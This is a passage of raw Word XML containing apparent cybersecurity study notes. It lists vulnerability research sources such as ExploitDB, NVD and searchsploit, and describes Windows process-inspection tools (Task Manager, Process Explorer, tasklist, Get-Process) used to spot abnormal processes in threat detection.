          <w:t>https://tryhackme.com/room/linuxprivesc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="248E2D5A" w14:textId="27F939AE" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>on Debian machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2683EE" w14:textId="319FA3FA" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/home/user/tools/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546276A6" w14:textId="7B1234AF" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA13868" w14:textId="7A4CAE65" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="00A00044" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Introduction to Research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB4423" w14:textId="7B058C73" w:rsidR="00A00044" w:rsidRPr="0084205E" w:rsidRDefault="00A00044" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>crawler searching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEA1B94" w14:textId="5B7FE192" w:rsidR="00A00044" w:rsidRPr="0084205E" w:rsidRDefault="00A00044" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ExploitDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53FD7E8C" w14:textId="374ADFC0" w:rsidR="00A00044" w:rsidRPr="0084205E" w:rsidRDefault="00A00044" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>search after discovering software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DFB3CE" w14:textId="30CF8F26" w:rsidR="00A00044" w:rsidRPr="0084205E" w:rsidRDefault="00A00044" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NVD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B36698" w14:textId="38B1F7DB" w:rsidR="00A00044" w:rsidRPr="0084205E" w:rsidRDefault="00A00044" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">CVE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mitre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E7E6606" w14:textId="71EFD475" w:rsidR="00A00044" w:rsidRPr="0084205E" w:rsidRDefault="00A00044" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18B68225" w14:textId="1626C21E" w:rsidR="00900715" w:rsidRPr="0084205E" w:rsidRDefault="00900715" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>man</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> command for tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F1C699" w14:textId="02B993AF" w:rsidR="00900715" w:rsidRPr="0084205E" w:rsidRDefault="00900715" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA4AB34" w14:textId="3E48CBAC" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00500D06" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Core Windows Processes – For Threat Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D64FF8" w14:textId="0F41D305" w:rsidR="00500D06" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Determining what is and is not normal behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2701FA" w14:textId="2DBC7CB5" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Task Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3308EF39" w14:textId="554F9BB1" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>provides information on resource usage, CPU, memory, process killing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A14AE77" w14:textId="2832F6D2" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Information Tabs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4633AFE7" w14:textId="35E666D8" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Type – App, Background process, windows process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63042F3A" w14:textId="040BECEA" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Publisher – author of program or file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C72D8" w14:textId="1E14BE1E" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PID – process identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCE46B0" w14:textId="7E1E1B52" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Process Name – file name of the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640B0EF3" w14:textId="7E8214BD" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Command Line – full command used to launch a process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F62A3AD" w14:textId="685DBF5A" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CPU – CPU power used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F82BCD4" w14:textId="2272AABE" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Memory – physical working memory used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCC3F4F" w14:textId="3BEFD0CD" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2A2FB8" w14:textId="2CBD9199" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8774F1" w14:textId="79FBB201" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Background Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E8D9A2" w14:textId="037CE0DC" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF8783E" w14:textId="634BB6C6" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAFAD0F" w14:textId="3719C478" w:rsidR="00F972BE" w:rsidRPr="0084205E" w:rsidRDefault="00F972BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>view core processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7292FA5F" w14:textId="7BAB6A56" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sort PIDs in ascending order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1B5748" w14:textId="38174865" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70411445" w14:textId="1BDE8567" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Image path name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B0861A" w14:textId="4C031204" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Command Line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD6EFA8" w14:textId="490496F6" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Both alert to process outliers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5020301C" w14:textId="304043A5" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>if image path name or command line is not what is expected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6FCD2F" w14:textId="385C7ABC" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>perform deeper analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDD530A" w14:textId="0B5667EA" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Task manager lacks certain important information, such as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDD4331" w14:textId="64C639E5" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>parent process information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7F7A3" w14:textId="35158EE7" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>essential to identifying outliers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17180D89" w14:textId="2F778911" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>use Process Hacker and Process Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D20EB2" w14:textId="063CFC85" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Process Hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A90155" w14:textId="2760DD7D" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Process Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1DD87B" w14:textId="32C140E6" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Command line options such as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE38C39" w14:textId="64CB5917" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tasklist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6825ADB5" w14:textId="47A33CFD" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C67A148" w14:textId="0B8259CD" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22BBC6CB" w14:textId="4E326CAC" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>wmic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7FDC05" w14:textId="1D78AF56" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
